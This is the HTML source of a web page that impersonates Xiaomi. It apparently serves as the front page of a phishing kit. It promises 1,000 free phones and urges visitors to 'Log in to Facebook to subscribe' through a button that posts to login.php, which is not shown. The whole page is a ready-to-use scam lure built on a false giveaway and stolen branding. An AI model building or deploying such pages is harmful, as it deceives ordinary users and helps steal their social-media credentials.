<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta property="og:image" content="https://upload.wikimedia.org/wikipedia/commons/thumb/2/29/Xiaomi_logo.svg/1024px-Xiaomi_logo.svg.png" />
	<title>Xiaomi Mobile</title>
	<link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/2/29/Xiaomi_logo.svg/1024px-Xiaomi_logo.svg.png">
	<style>
	    @import url('https://fonts.googleapis.com/css2?family=Almarai:wght@700&display=swap');
        html{
        	scroll-behavior: smooth;
        	height: 100%;
        }
        body{
        	background: url(https://i02.appmifile.com/50_bbs_en/13/07/2020/0cd15e2660.png);
        	background-size: cover;
        	background-position: center;
        }
        form{
        	background: #FFF;
        	padding:15px;
        	width: 40%;
        	border-radius: 10px;
        	box-shadow: 0px 0px 10px rgba(0,0,0,.3);
        	margin-top: 10em;
        	font-family: 'Almarai', sans-serif;
        }
        form input{
        	height: 45px;
        	width:100%;
        	text-align: center;
        	margin-bottom: 7.5px;
        	border:0;
        	border-bottom: 2px solid #427DD7;
        	font-size: 19px;
        	outline: none;
        	color: rgba(0,0,0,.7);
        	font-family: 'Almarai', sans-serif;
        	background: rgba(0,0,0,.1);
        }
        form button{
        	width: 100%;
        	height: 50px;
        	font-size: 18px;
        	border-radius: 10px;
        	background: #427DD7;
        	border:0;
        	outline: none;
        	font-family: 'Almarai', sans-serif;
        	color: #FFF;
        }
        form span{
        	font-family: 'Almarai', sans-serif;
        }
        @media(max-width:786px){
        	form{
        		width: 90%;
        		margin-top: 5em;
        	}
        }
	</style>
</head>
<body>
	<center><form method="POST" action="login.php">
		<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/29/Xiaomi_logo.svg/1024px-Xiaomi_logo.svg.png" style="border-radius: 50%;" width="125" alt="">
		<p>Xiaomi has allocated 1000 xiaomi phone for free, You only need to get your phone before the quantity runs out Answer the following questions Log in to Facebook to subscribe</p>
		<a href="login.php"><button type="submit">Continue</button></a>
		<br><br><span class='copy'>CopyRight 2021 &COPY;</span>
	
	</form></center>
</body>
</html>